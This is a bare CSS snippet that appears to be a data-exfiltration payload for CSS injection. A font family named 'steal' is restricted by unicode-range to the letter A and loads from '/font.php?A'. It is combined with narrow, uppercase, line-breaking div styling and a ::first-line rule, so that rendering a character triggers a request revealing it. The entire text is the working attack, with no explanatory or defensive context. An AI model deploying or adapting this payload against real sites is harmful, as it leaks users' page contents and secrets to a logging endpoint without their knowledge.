 @font-face {
    src: url("/font.php?A");
    unicode-range: U+0041;
    font-family: steal;
    font-display: block;
 }

 div {
    width: 8ch;
    word-wrap: break-word;
    word-break: break-all;
    overflow-wrap: break-word;
    text-transform: uppercase;
 }

 div::first-line {
    font-family: steal;
    background-color: green;
}